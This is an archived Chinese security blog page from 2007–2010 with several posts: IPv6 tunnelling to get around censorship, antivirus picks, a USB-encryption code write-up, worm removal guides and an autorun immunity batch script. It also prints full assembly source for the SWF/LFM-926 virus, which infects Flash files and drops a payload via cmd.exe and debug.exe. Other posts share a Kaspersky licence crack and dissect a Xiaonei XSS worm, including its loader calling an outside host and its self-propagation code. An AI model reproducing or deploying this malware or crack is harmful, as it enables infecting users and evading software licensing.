2010年04月24日

IPV6使用教程

本文尽量用简单明了的语言描述。
ipv6应该是下一代因特网使用的协议，比ipv4要高级，保密性也更好。我使用它的原因是目前“伟大的防火墙”对ipv6的网络还没开始审查，可以用来翻墙。
———————————————————————————————————————
方法一:（适用于adsl直接拨号上网的方式）
点击开始->运行，输入cmd 回车，然后在弹出的命令框中照下面的样子输入命令：
C:\Documents and Settings\Administrator>netsh
netsh>int
netsh interface>ipv6
netsh interface>ipv6>install （WIN7已经安装了ipv6协议，不需要这个步骤 ）
netsh interface ipv6>isatap
netsh interface ipv6 isatap>set router isatap.sjtu.edu.cn （此处利用上海交大的IPV6通道）
关闭所有浏览器，重新打开，访问www.ipv6.org 看看你的页面。(当你看到 You are using IPv6 from 2001:…… 时，你就已经成功地将你的网络环境改为了IPV6）
我用了上面的命令就已经成功了，记得要重新打开浏览器。
我在xp+ADSL直接拨号上网环境下测试成功。 (全文 ...)

» 阅读全文...

Tags: gfw,IPv6,教程,翻墙.

2007年11月3日

十种武器保证你的系统安全

我相信玩很多玩黑软的朋友都有这样一个问题。想安全吧，装杀毒软件，结果自己的很多黑软都被杀的光光，不装吧，又怕被病毒感染，后门等等，导致系统挂掉，硬盘也要格式化。哈哈。今天我就把我自己如何解决这些问题的方法告诉你们，既可以随心所欲的玩黑软，又不担心病毒的骚扰。
注：以下只是我个人所见。由于下面所涉及到的软件网上都有的下，再有本论坛空间有限，就不上传了，如网上有找不到的可以联系我。

1 avast4.78 [安装版]：占用内存非常小，全面监控，WEB监控不比Kaspersky6差，防火墙也不错。内存监控比较弱。

2 AVG Anti-Virus v7.5 [安装版]：占用内存非常强[尤其文本，比诺盾还强。]，全面监控，WEB监控不行。内存监控比较强。

3 Dr.Web V4.33 [绿色版]：大蜘蛛占用内存非常小，内存监控强，查杀能力非常强。

4 Virus Chaser [绿色版]：驱逐舰占用内存非常小，内存监控非常强，查壳能力非常强。注意，如果开启内存监控，他所疑视文件会被锁定，只有结束它的进程后重起机器才可以。[做辅助查杀非常不错]

5 Kaspersky6 [绿色版]：无监控，占用内存非常小，查杀能力强。[做辅助查杀非常不错]

6 AVG Anti-Spyware 7.5 [绿色版]：启发式监控，占用内存非常小，查杀能力强。[做辅助查杀非常不错]

7 F-Prot Antivirus v3.16F [绿色版]：冰岛占用内存非常小，无监控，用内存非常小，查杀能力比较强。[做辅助查杀非常不错]

8 卡巴斯基防火墙 [绿色版]：操纵明了，自定义规则能力非常强，可防御冲击波等病毒。但与AVAST4.78自带的防火墙功能冲突，导致AVAST自带的防火墙功能不能运行，不过AVAST那些功能正好是卡巴斯基防火墙的本职功能，正好拟补。[怕麻烦的别用这个，哈哈。]

9 360safe3.0 [绿色版]：最后一个就是这个了，不是叫你找流氓软件啊，而是它有个非常好用的功能，就是他的注册表监视功能。如有更改，它会提示你操纵。再通过它的其他功能一目了然的了解所有动作。[推荐使用]

10 影子系统 [安装版]：这个是我最后推荐的，如果你看后觉得装杀毒还是麻烦，或者说我根本就不想装，再者说，你要本机测试木马病毒等，那我隆重推荐你使用影子系统，安装简单，一路下一步，最后重起机器就OK了，启动机器时会在启动项里有[进入影子系统单一模式：这个模式是只保护你的系统盘][进入影子系统完全模式：这个模式是保护你硬盘所有分区]，你也可以跳过这个，在桌面的快捷方式启动影子系统。用影子系统的好处是：1单一模式(保护系统盘)，你的所有操纵都是建立在系统盘上的，本机测试木马病毒等时所有都是要写进系统的，重起机器后所有操纵都会被还原，即使是木马，病毒都会消失！如果你有需要保存的软件等，不要保存在系统盘，请存放在其他未被保护的盘，这样才不会被还原。2完全模式(保护硬盘所有分区)即使你中了硬盘炸弹，重起机器后你的硬盘还是安然无恙。3还原能力经本人测试，远远超过还原精灵和还原卡。我用影子

» 阅读全文...

Tags: 安全,软件.

移动存储安全

当你的U盘，移动硬盘遗失了，被盗了，或者是遗忘在公共场所，里面的资料就会完全被别人窥探，如果涉及一些隐私，机密，那后果是很严重的。本课题就是在这样一个情况下产生的。这里剖析的只是一个最初的演示原型，详细设计，以及一些细节可以参考源代码。源代码在WinXP，VC6.0编译通过。

[代码性质] VC完整应用程序代码
[文件大小] 16K
[下载] 下载文件 Jeffrey_mss.rar (15.78 KB , 下载:17次)

摘要：实现对移动存储设备的加密，保护信息隐蔽，防止隐私泄露。

关键字：移动存储设备加密安全

1、访问注册表读取计算机上的移动存储设备

在注册表

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Disk\Enum

下面可以看到计算机当前的状态，这里可以看到所有的存储设备的情况，包括计算机的硬盘，通过情况下，名称为0的是计算机硬盘，所以在列出的选择设备时，会把名称为0的屏蔽，不然太危险，一旦造成系统的破坏，后果会很麻烦。对注册表的读写：

HKEY hkey;

char sz[256];

DWORD dwtype,sl = 256;

for(int i=1;i<8;i++)

        if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum",\

               NULL, KEY_ALL_ACCESS, &hkey)==ERROR_SUCCESS)

               CString id;

               id.Format("%d",i);

               if(RegQueryValueEx(hkey,id,NULL,&dwtype,(LPBYTE)sz,&sl)==ERROR_SUCCESS)

                       CString str=(CString)sz;

                       m_select.AddString(sz);

RegCloseKey(hkey);

2、对磁盘的扇区的操作

　　Windows 操作系统在很大程度上采取了访问安全保护机制（例如，在Windows操作系统下不能直接访问物理内存、不能使用各种DOS、BIOS中断等等），其实Windows在采取“实保护”措施的同时也提供了另外的一种有别于在DOS下访问硬件设备的方法，即把所有的硬件设备全部看做“文件”，并允许按照对文件的读写方式来对其进行数据存取访问。对于磁盘扇区的读写，可以通过C++的CreateFile()函数来实现。由MSDN可查询到该函数原型：

HANDLE CreateFile(

LPCTSTR lpFileName,

DWORD dwDesiredAccess,

DWORD dwShareMode,

LPSECURITY_ATTRIBUTES lpSecurityAttributes,

DWORD dwCreationDisposition,

DWORD dwFlagsAndAttributes,

HANDLE hTemplateFile );

由于访问的是事实上已经存在的磁盘扇区，因此只能以OPEN_EXISTING标志设置dwCreationDisposition参数指出将要打开已经存在的文件（设备）。至于其他参数的使用与操作普通文件时的用法相同。
使用的时候，如果需要定位到某一个具体的扇区，可以使用SetFilePointer()函数：

DWORD SetFilePointer(HANDLE hFile,LONG lDistanceToMove,PLONG lpDistanceToMoveHigh,DWORD dwMoveMethod);

　　在定位到要访问的扇区开始位置后就可以通过ReadFile（）或WriteFile（）函数实施相应的读写访问了，具体操作与文件读写并没有什么太大的差别。最后，在完成访问操作后以CloseHandle（）关闭文件句柄释放资源，从而完成一次完整的磁盘扇区数据访问操作。

int ReadDisk(CString driver,unsigned char *Buf,long addr)

        HANDLE hDevice;

        BOOL bResult;

        DWORD bytesread;

        hDevice=CreateFile(driver,GENERIC_READ|GENERIC_WRITE,

               FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,0,NULL);

        if(hDevice==INVALID_HANDLE_VALUE)

               AfxMessageBox("Error!");

               return 0;

        if(addr!=0)

               SetFilePointer(hDevice,512*addr,NULL,NULL);

        bResult=ReadFile(hDevice,Buf,512,&bytesread,NULL);

        if((bResult==FALSE)||(bytesread<512))

               AfxMessageBox("Error!");

               return 0;

        CloseHandle(hDevice);

        return 1;

3、用RC4加密算法对磁盘加密。

/* RC4加密，KEY是密钥，此处Key[]="MobileStorageSecurity",后期可以用户输入的密码作为密钥 */

RC4_KEY rc4_key;

build_rc4_key(Key,strlen((char*)Key),&rc4_key);

rc4_handler(MBRBuf,strlen((char*)MBRBuf),&rc4_key);

4、U盘插入计算机时的自动感知

LRESULT CRawDiskDlg::WindowProc(UINT message, WPARAM wParam, LPARAM lParam)

        if ( WM_DEVICECHANGE == message && FALSE == bCopy )

               //刷新设备列表

        return CDialog::WindowProc(message, wParam, lParam);

后期改进

这样就必须要求在电脑上有这个程序，所以在后期采用同样的原理，将这个程序放在U盘里，在加密的时候实现对自身的屏蔽，这样大大提高程序的易用性。
可以让用户输入密码，将密码作为密钥去加密和解密。

3.这个只是对一个磁盘最初的512字节加密，后期可以通过对扇区的定位和计算，对目录表及数据加密。

» 阅读全文...

Tags: 安全,移动存储.

2007年10月31日

手动清除chcp.exe病毒保护MSN的安全

随着即时通讯工具的强大，木马病毒也加快了脚本，MSN早就成为了其通向第三方计算机感染跳越的平台。在好友圈中，只要盗取一个MSN好友帐号或感染一台用户计算机，病毒即会伸出罪恶之手，将会在用户MSN聊天时发送病毒信息。

病毒分析
该病毒属于MSN蠕虫变种，被感染的计算机会自动向MSN联系人发送诱惑文字消息和带毒压缩包，当对方接收并打开带毒压缩包中的病毒文件时，系统即成为新的受害者，并因此尝试感染另一台计算机。病毒大小为434,176 字节，通过MSN聊天工具进行传播。

被感染的计算机，病毒首先会在系统目录 %Windows%下生成含带病毒源体的F0538_jpg.zip压缩包，随后病毒自身开始在计算机中的%Windows%目录下创建副本chcp.exe 可执行文件，并在注册表[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]分支下建立"chcp.exe"="%Windows%\chcp.exe"自启动项目，然后病毒开始修改注册分支[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]下的"SFCDisable"=dword:ffffff9d 和"SFCScan"=dword:00000000值，进行关闭系统文件保护，并且更改 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control]分支下的 "WaitToKillServiceTimeout"=的值为"7000"，达到更改自动关闭进程等待时间的效果。

完成上述后，病毒仍没有安静的等待，而是查找被感染的计算机中是否存在FTP目录，如果有则将原正常程序改名为backup.ftp、backup.tftp并复制到%System%\microsoft目录下，随后在系统目录%System%下写入ftp.exe、tftp.exe、dllcache\tftp.exe、dllcache\ftp.exe可执行程序，做完一系列的手脚，病毒开始向MSN联系人发送诱惑型文字消息，并夹带毒包F0538_jpg.zip欺骗用户打开。

清除方法
中了此毒的用户也不要紧张，在了解了生存原理后要想清除该病毒也非难事，只要按照以下几个步骤实施即可将病毒清除出界，让系统中的MSN正常运行。

一、首先要进入注册表分支[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下，将"chcp.exe"="%Windows%\chcp.exe"自建的随机启动项删除，完成后重启计算机。

二、进入%Windows%\目录下将病毒源体文件chcp.exe及F0538_jpg.zip压缩包删除。

三、将目录%System%下的FTP破坏代替程序ftp.exe、tftp.exe、dllcache\tftp.exe、dllcache\ftp.exe删除，并将%System%\microsoft目录下的backup.ftp、backup.tftp改回到目录%System%下。

四、删除注册表分支[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]下的"SFCDisable"=dword:00000000键值，恢复系统文件保护。

    五、最后将注册表[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control]分支下的"WaitToKillServiceTimeout"=改为"20000" 从而恢复系统自动关闭进程等待时间的默认配置。

    笔者按：在MSN病毒中变体有很多种如：MSN机器人、MSN小丑、MSN性感相册等，其原理都是利用MSN作为平台在同聊友沟通的同时发送病毒信息，通过MSN好友关系欺骗用户点击，然后再次传播，从而形成强大的传播途径。为了更好的处理此类病毒，这里建议用户加强计算机的先期保护如：开启杀软定时升库，安装安全类软件，不定期打入系统补丁等，并且多了解每日病毒动态，即时作好防范工作即可，一但用户被感染时应立即作出回应，利用手工删除或下载相应的专杀工具进行清理，以免让更多的用户成为受害者。

» 阅读全文...

Tags: 安全,病毒.

2007年10月30日

编写autorun病毒免疫工具

autorun病毒的危害相信中过招的人都有体会。其最大的特点就在于很难清除干净，现在可以提前对系统分区做一次免疫工作，而那些已经中了autorun病毒的用户也能顺便将病毒清除。

有人曾经使用系统组策略的方法，不过对于初学者来说有点复杂。现在复制以下代码到文本文件中，保存为bat文件即可。
    @echo off
cls
echo          按 S 键删除Autorun.inf并进行免疫
echo.
echo          按 D 键删除免疫程序
echo.
echo          按其他任意键退出
echo.
echo.
SET Choice=
SET /P Choice=        请选择要进行的操作：
IF /I ’%Choice:~0,1%’==’s’ GOTO setup
IF /I ’%Choice:~0,1%’==’d’ GOTO Delset
IF /I ’%Choice:~0,1%’==’q’ GOTO Exit
exit
:Setup
taskkill /im explorer.exe /f
for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do @(
    if exist %%a: (
        rd %%a:\autorun.inf /s /q
        del %%a:\autorun.inf /f /q
        mkdir %%a:\autorun.inf
        mkdir %%a:\autorun.inf\"病毒免疫勿删除../"
        attrib +h +r +s %%a:\autorun.inf

    )
)
start explorer.exe
for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
  if exist %%a:\nul (
    >1.vbs echo msgbox^ "%%a:免疫成功",64,"提示:"
    1.vbs
  )
)
del 1.vbs
echo.
echo.
echo                        按任意键退出...
pause>nul
exit
:delset
For %%a In (C D E F G H I J K L M N O P Q R S T U V W X Y Z) Do @(
    If Exist %%a: (
        rd %%a:\autorun.inf /s /q

    )
)
echo.
echo.
echo                        操作完毕，按任意键退出...
pause>nul
exit

具体原理为通过检测autorun.inf和删除相应文件达到直接消灭病毒的目的。操作比较简单，只要按两个键就可以了。

» 阅读全文...

Tags: 安全,病毒.

U盘(auto病毒)类病毒分析与解决方案

一、U盘病毒简述：
　　U盘(自动运行)类病毒(auto病毒)近来非常常见，并且具有一定程度危害，它的机理是依赖Windows的自动运行功能，使得我们在点击打开磁盘的时候，自动执行相关的文件。目前我们使用U盘都十分频繁，当我们享受U盘所带来的方便时，U盘病毒也在悄悄利用系统的自动运行功能肆意传播，目前流行的U盘病毒文件大家甚至耳熟能详了，比如经常有网友问的SSS.EXE SXS.EXE如何查杀这类的，下面我们将对U盘病毒极其特性和防范办法进行分析总结。
　　
二、特性分析：
　　所谓的自动运行功能是指Windows系统一种方便特性，使当光盘、U盘插入到机器自动运行，而这种特性的实现就是通过磁盘跟目录下的 autorun.inf文件进行。这个文件保存在驱动器的根目录下(一般会是一个隐藏属性的系统文件)，它保存着一些简单的命令，告知系统新插入的光盘或 U盘应该自动启动什么程序等。
　　常见的Autorun.inf文件格式大致如下：
　　[AutoRun]　　　　//表示AutoRun部分开始，必须输入
　　icon=C:\C.ico　　//指定给C盘一个个性化的盘符图标C.ico
　　open=C:\1.exe　　//指定要运行程序的路径和名称，只要在此放入病毒程序就可自动运行;
　　在Windows系统有允许和阻止自动运行的键值的方法：
　　在注册表中找到如下键：
　　键路径：[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Exploer]
　　在右侧窗格中有 "NoDriveTypeAutoRun"这个键决定了是否执行Autorun功能.其中每一位代表一个设备,不同设备用以下数值表示:
　　设备名称第几位值设备用如下数值表示设备名称含义
　　DRIVE_UNKNOWN 0 1 01h 不能识别的类型设备
　　DRIVE_NO_ROOT_DIR 1 0 02h 没有根目录的驱动器
　　DRIVE_REMOVABLE 2 1 04h 可移动驱动器
　　DRIVE_FIXED 3 0 08h 固定的驱动器
　　DRIVE_REMOTE 4 1 10h 网络驱动器
　　DRIVE_CDROM 5 0 20h 光驱
　　DRIVE_RAMDISK 6 0 40h RAM磁盘
　　其中：保留 7 1 80h 　未指定的驱动器类型
　　以上值"0"表示设备运行，"1"表示设备不运行。
　　从上面可以看出，对应的DRIVE_NO_ROOT_DIR、DRIVE_FIXED、DRIVE_CDROM、DRIVE_RAMDISK是可以自动运行的。所以要禁止硬盘自动运行AutoRun.inf文件，就必须将DRIVE_FIXED这些键的值设为1，由于DRIVE_FIXED代表固定的驱动器(即硬盘)。如果仅想禁止软件光盘的AutoRun功能，但又保留对CD音频碟的自动播放能力，这时只需将“NoDriveTypeAutoRun”的键值改为：BD,00,00,00即可。
　　U盘病毒就是利用这种系统特性，一般在感染后会修改系统的注册表，将显示所有文件的选项设置为禁止。甚至修改磁盘关联，杀毒软件一般会只把病毒文件清除，但对残余的文件不会处理。这也是常见的杀毒软件为什么常常无法清除干净，或者清除后双击无法打开磁盘的原因。
　　
三、解决方案：
　　1、使用超级巡警套装来全面解决U盘病毒问题(推荐!):
　　①超级巡警对U盘病毒检测进行了特别的处理，可以快速的监测和定位U盘病毒，并清除它们。
　　②超级巡警同时还提供对注册表关联修复和自动运行阻止的处理。
　　2、手动解决办法：
　　①根据上面的原理，自己修改注册表禁止磁盘的自动运行特性。
　　②把文件夹选项中隐藏受保护的操作系统文件钩掉，选中显示所有文件和文件夹，点击确定。这样可以在感染病毒的移动存储设备中会看到几个文件(包括autorun.inf和病毒文件)，删除后，病毒就清除了。

» 阅读全文...

Tags: 安全,病毒.

2007年10月28日

国外的第一只[感染*.swf]flash病毒的源代码

SWF/LFM-926 Virus:
; ------------------
; Description: WinNT/XP Virus dropper for Flash .SWF files!
; Masm Version 6.11: ML.EXE SWF.ASM
; Virus Size: 926 bytes
; Infection Size: 3247 bytes.
; Last Edit: 01/08/2002

; --------------------------------- Begin Source Code ------------------------------------

.286
.model tiny
.code
org 100h

Entry: jmp Start

VIR_SIZE equ Virus_End-Entry

DTA db 128 dup(0) ; Offset DTA+30 = filename
HANDLE dw ? ; Handle to host file
PTR1 dd 0 ; Segment address of the created memory block
PATH db "*.SWF",0 ; File mask
BINARY db "v.com",0 ; Binary code
HEX db "0123456789ABCDEF" ; Binary to hex

; Flash header block.
; -------------------
SIGN_FW dw ? ; SWF file format
SIGN_S db ?
VERSION_NUM db ?
FILE_LENGTH dw ?
dw ?
STATIC_HDR_SIZE equ $-SIGN_FW

RECT_BUF db 20 dup(0) ; Header length is variable because the RECT region isnt static. ;(
RECT_BUF_SIZE equ $-RECT_BUF

HDR_SIZE dw ? ; Holds the true header size!

; Start of Viral Frame 0.
; -----------------------
Drop_BEGIN db 03fh,003h ; DoAction Tag(12) long format. Learn the bytecodes!
TAG_LENGTH dw 0 ; (ACTION LENGTH+3)+1[END_TAG]
dw 0
db 083h ; ActionGetUrl Tag
ACTION_LENGTH dw 0 ; (Drop_BEGIN_SIZE-9)+(SUM OF Drop_MIDDLE)+(Drop_END_SIZE)
db FSCommand:exec
db 000h
db cmd.exe
db 009h ; chr(9) is Flash code for a space character.
db /c
db 009h
db echo
db 009h
db Loading.Flash.Movie...
db &
db (echo
db 009h
db n
db 009h
db v.com&echo
db 009h
db a
db 009h
db 100&
Drop_BEGIN_SIZE equ $-Drop_BEGIN

Drop_MIDDLE db echo
db 009h
db db
db 009h
db 71 dup(,) ; db XX,...,XX where XXs are viral hex codes.
db &
Drop_MIDDLE_SIZE equ $-Drop_MIDDLE

Drop_END db &echo.&echo
db 009h
db rcx&echo
db 009h
db 39E ; Define hex 39E (VIR_SIZE) as a string. Changes if this code changes.
db &echo
db 009h
db w&echo
db 009h
db q)|debug.exe>nul&start
db 009h
db /b
db 009h
db v.com
db 000h ; StringEnd Tag
Drop_END_SIZE equ $-Drop_END

; End of Viral Frame 0.
; ---------------------
END_TAG db 001h ; Action code 0x01 = tagshowframe Tag

Start:
mov ax,(VIR_SIZE+0fh)
shr ax,4
shl ax,1
mov bx,ax ; Allocate (VirusSize*2)
mov ah,4ah
int 21h ; Resize block
jc ExProg

mov dx,offset DTA ; Set DTA operation
mov ah,1ah
int 21h

mov cx,07h
mov dx,offset PATH
mov ah,4eh ; FindFirst
int 21h
jc ExProg
jmp Infect
Cycle:
mov dx,offset PATH
mov ah,4fh ; FindNext
int 21h
jc ExProg
jmp Infect
ExProg:
mov ax,4301h ; Hide v.com
mov cx,02h
mov dx,offset BINARY
int 21h

mov ax,4c00h ; End program
int 21h
Infect:
mov byte ptr DTA[30+12],$
mov dx,offset (DTA+30)

mov ax,3d02h ; Open host file
int 21h
jc ExProg

mov [HANDLE],ax ; Save file handle

mov ax,3f00h ; Read file Header
mov dx,offset SIGN_FW
mov bx,[HANDLE]
mov cx,(STATIC_HDR_SIZE+RECT_BUF_SIZE)
int 21h
jc ExProg

cmp word ptr SIGN_FW,WF ; Check for a valid Flash SWF file.
jne Cycle ; Try another file ...
cmp byte ptr SIGN_S,S
jne Cycle
cmp byte ptr VERSION_NUM,099h ; Already infected?
je Cycle

mov cx,RECT_BUF_SIZE ; Search for the SetBackgroundColor Tag.
xor di,di ; Seems to always exist directly after the header.
next: cmp byte ptr RECT_BUF[di],043h
jne not_found
cmp byte ptr RECT_BUF[di+1],002h
jne not_found
jmp found
not_found:
inc di
loop next
jmp Cycle
found:
mov word ptr HDR_SIZE,STATIC_HDR_SIZE
add word ptr HDR_SIZE,di ; Compute the header size

mov ax,4200h ; Reset file ptr right after Flash header
xor cx,cx
mov dx,[HDR_SIZE]
int 21h
jc ExProg

push bx
mov ax,word ptr FILE_LENGTH
add ax,15
shr ax,4
mov bx,ax
mov ah,48h ; Allocate memory for target host file
int 21h
pop bx
jc ExProg
mov word ptr PTR1[2],ax ; Save pointer to allocated block

mov cx,word ptr FILE_LENGTH
sub cx,[HDR_SIZE]
mov ah,3fh ; Read host file into memory block
push ds
lds dx,[PTR1]
int 21h
pop ds
jc ExProg

mov ax,4200h ; Reset file ptr to the middle code section
xor cx,cx
mov dx,[HDR_SIZE]
add dx,Drop_BEGIN_SIZE
int 21h
jc ExProg

;
; The following code is a key technique. It simply converts the
; virus from binary to hex characters and then inserts them into the host
; using a standard format that DEBUG.EXE expects! Flash only really
; allows plain text, so this satisfies that condition.
;

mov word ptr ACTION_LENGTH,(Drop_BEGIN_SIZE-9+Drop_END_SIZE)
push bx
mov cx,VIR_SIZE
xor si,si
xor di,di
ToHex:
mov bx,offset HEX ; Convert 8-bit binary number to a string representing a hex humber
mov al,byte ptr Entry[si]
mov ah,al
and al,00001111y
xlat
mov Drop_MIDDLE[STATIC_HDR_SIZE+di+1],al
shr ax,12
xlat
mov Drop_MIDDLE[STATIC_HDR_SIZE+di],al
inc si
inc di
inc di
inc di
mov ax,si
mov bl,24 ; Debug.exe can handle at most 24 defined bytes on 1 line.
div bl
or ah,ah
jnz cont
push cx
xor di,di
add word ptr ACTION_LENGTH,Drop_MIDDLE_SIZE
mov bx,[HANDLE] ; Write hex dump entry XX,...,XX
mov dx,offset Drop_MIDDLE
mov cx,Drop_MIDDLE_SIZE
mov ax,4000h
int 21h
jc ExProg
pop cx
cont:
loop ToHex
pop bx

or di,di
jz no_remainder

mov dx,offset Drop_MIDDLE
mov cx,di
add cx,7 ; STATIC_HDR_SIZE-1
add word ptr ACTION_LENGTH,cx
mov ax,4000h ; Write remainder hex dump entry XX,...,XX
int 21h
jc ExProg

no_remainder:
mov dx,offset Drop_END
mov cx,Drop_END_SIZE+1
mov ax,4000h ; Write end code and end of frame tag(01) into host
int 21h
jc ExProg

mov cx,word ptr FILE_LENGTH
sub cx,[HDR_SIZE]
mov ax,4000h ; Write host code directly after viral code.
push ds
lds dx,[PTR1]
int 21h
pop ds
jc ExProg
; Patch the header with new viral values.
mov cx,word ptr ACTION_LENGTH
add cx,4
mov word ptr TAG_LENGTH,cx
add cx,6
add word ptr FILE_LENGTH,cx ; Total file size increase = (TAG_LENGTH+6)
; Set infection marker
mov byte ptr VERSION_NUM,099h

mov di,[HDR_SIZE]
inc word ptr [SIGN_FW+di-2] ; Increase Frame count by 1

mov ax,4200h ; Re-wind to start of file
xor cx,cx
xor dx,dx
int 21h
jc ExProg

mov dx,offset SIGN_FW
mov cx,[HDR_SIZE]
mov ax,4000h ; Write updated viral header
int 21h
jc ExProg

mov dx,offset Drop_BEGIN
mov cx,Drop_BEGIN_SIZE
mov ax,4000h ; Write begin code into host
int 21h
jc ExProg

mov ah,49h ; Free memory block
mov es,word ptr PTR1[2]
int 21h
jc ExProg

mov ax,3e00h ; Close file
int 21h
jc ExProg

jmp Cycle ; DONE! Try to infect another.

Virus_End:
end Entry

被复仇天说后，重新看了下文件，感觉有点问题，特重新更改标题。
以上内容只供学习、研究使用，如果利用其来搞破坏或者是做些违法的事情。

» 阅读全文...

Tags: 病毒.

2007年10月22日

Visual Studio2005入门.Net系列视频教程

本系列教程的课程安排参考了多本.net 1.1以及在目前的2.0新书的基础上认真编订。不敢夸口本系列多了不起,但至少敢保证你看完本系列,再做完每个小结的测试,你入门是绝对没有问题的!做一个简单的网站是绝对可以的!祝愿大家能够尽快进入.net 2.0的世界。也希望本教程能够帮助你更好的学习。

http://www.ibook8.com/tech/vs2005.html

» 阅读全文...

Tags: .net,visual studio2005,开发.

2007年10月21日

破解卡巴6&7，从此不必再找Key！

以前我一直用这个破解kis 6.0，已经用了几个月了，很好用。
今天终于找到它的支持kis/kav 6&7全系列的版本了！
似乎这里还有不少问key，所以赶紧拿来和大家分享！

强烈推荐！
从此真的不必再四处找key了。

方法:
1、关掉卡巴的自我保护。
2、退出卡巴。
3、把这个文件拷贝到卡巴的安装目录中。
4、点选两个钩，执行破译。

破解后随便找个key(过期也没关系)注册,即可永久使用。
使用年数可自定。一般择默认20年就足够了。
选更大的年限，只是有人会看得爽。呵。
下面是我破解7的信息。
下载文件破解卡巴6&7，从此不必再找Key.rar (353.38 KB , 下载:226次)

» 阅读全文...

Tags: key,卡巴.

2007年10月20日

一个不为人知的感染几百万校内网用户的蠕虫分析

文章作者：langouster
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

在一次查看校内网网页源程序的时候无意间发现一个校内蠕虫，开始还以为是我的网页有问题，就随便打开几个人的页面查看，发现许多人的页面上也有这段代码。

以上代码出现在日志的开头，只有查看源文件才能发现。它将vbscript调了个头写，调回来就变成以下内容：

set s=document.createElement("script")
s.src=http://www.sosoface.com/images/xnjs.jpg
document.getElementById("mya113").parentNode.insertBefore s,document.getElementById("mya113")

在这段脚本中它又新建了一个script，它的src指向http://www.sosoface.com/images/xnjs.jpg（别相信后缀），下载加这个“jpg”用记事和UE打开都发现它填充了大量的asc的00（真不敢相信填充了那么多00 IE还能执行），不过用Dreamweaver打开显示正常，拷出JS。然后花了几乎一天的时间来分析这个js文件，发现它完完全全是一个基于ajax的蠕虫。
值得注意的是作者好像很低调，在蠕虫代码中除了感染就是隐藏，没有一行破坏性的代码，仅仅是加了一个站长统计，估计作者是用来研究蠕虫传播情况的，因为站长统计要密码我们进不去，所以不知道具体的感染情况，但是我刚才在google上搜了下sosoface，还是看到这个网站的流量图：
http://www.chinarank.org.cn/detail/Info.do?url=www.sosoface.com&r=1192875678218

从图上可以看到流量在几天时间里大增，这些天应该是蠕虫感染的时间。日访问人数从0猛增到500百万人/天，也就是每天那个JPG要被访问5亿次考虑到一个人可能访问多个页面，粗略估计应该至少有几百万人受到感染。另外，也就在大概两三天前这个蠕虫应该是被校内的人发现了，一夜之间全部消失了。 Sosoface也被停了。

下面来分析感染代码，我直接把注释写在JS中了，原本的程序可是一行注释也没有的。看时从最底下的start函数看起：

var req = null;
var step=null;
var DiaryMonthUrlList="",DiaryUrlList="";
var timer=null;
var bIsBusy=false;

var myrand="46.115.50.124.115.127.119.47.48.127.107.115.35.35.33.48.50.123.118.47.48.127.107.115.35.35.33.48.50.97.102.107.126.119.47.53.112.115.113.121.117.96.125.103.124.118.40.103.96.126.58.100.112.97.113.96.123.98.102.40.119.106.119.113.103.102.119.58.65.102.96.64.119.100.119.96.97.119.58.48.59.48.48.33.35.35.115.107.127.48.48.58.118.91.107.80.102.124.119.127.119.126.87.102.119.117.60.102.124.119.127.103.113.125.118.62.97.50.119.96.125.116.119.80.102.96.119.97.124.123.60.119.118.125.92.102.124.119.96.115.98.60.59.48.48.33.35.35.115.107.127.48.48.58.118.91.107.80.102.124.119.127.119.126.87.102.119.117.60.102.124.119.127.103.113.125.118.50.40.48.48.117.98.120.60.97.120.124.106.61.97.119.117.115.127.123.61.127.125.113.60.119.113.115.116.125.97.125.97.60.101.101.101.61.61.40.98.102.102.122.48.48.47.113.96.97.60.97.40.59.48.48.102.98.123.96.113.97.48.48.58.102.124.119.127.119.126.87.119.102.115.119.96.113.60.102.124.119.127.103.113.125.118.47.97.50.102.119.97.48.59.59.50.59.53.44.46.61.115.44";

text=text.substring(i,j);
//------------------------

i=text.indexOf("id="title" class="inputtext" tabindex="1" value="",0);
if(-1==i)return;
i+=49;
j=text.indexOf("" />",i);
if(-1==j)return;
title=text.substring(i,j);
//---
i=text.indexOf("<textarea name="body" id="body" cols="100%" style="display:none">",0);
if(-1==i)return;
i+=65;
j=text.indexOf("</textarea>",i);
if(-1==j)return;
body=text.substring(i,j);
//---
i=text.indexOf("id="blog_pic_id" value="",0);
if(-1==i)return;
i+=24;
j=text.indexOf("" />",i);
if(-1==j)return;
blog_pic_id=text.substring(i,j);
//---
i=text.indexOf("id="pic_path" value="",0);
if(-1==i)return;
i+=21;
j=text.indexOf("" />",i);
if(-1==j)return;
pic_path=text.substring(i,j);
//---
i=text.indexOf("name="id" value="",0);
if(-1==i)return;
i+=17;
j=text.indexOf("" />",i);
if(-1==j)return;
Diaryid=text.substring(i,j);
//---
i=text.indexOf("" selected="selected"",0);
if(-1==i)return;
j=i-2;
if(text.substr(j,1)==""")
j++;
blogControl=text.substring(j,i);

body=my_HtmlDecode(body);
if(body.indexOf("mya113",0)>=0)//已经感染过，不再感染
{
req=null;
step="GetDiaryText";
bIsBusy=false;

return;
}
else
{
;
}
//以上是取日志的各个变量信息
//以下开头就感染日志并修改

body=MyDecode(myrand)+body;
//感染日志在日志的开头加上跨站代码
//MyDecode(myrand)中保存的就是跨站的关键代码，作者加密了一下放在myrand变量中，程序开头的一长串数据就是

//以下开始POST提交修改过的日志
argv="";
argv+="-----------------------------7d71861cb014cContent-Disposition: form-data; name="title"";
argv+=(title+"");
argv+="-----------------------------7d71861cb014cContent-Disposition: form-data; name="body"";
argv+=(body+"");
argv+="-----------------------------7d71861cb014cContent-Disposition: form-data; name="theFile"; filename=""Content-Type: application/octet-stream";
argv+="-----------------------------7d71861cb014cContent-Disposition: form-data; name="blog_pic_id"";
argv+=(blog_pic_id+"");
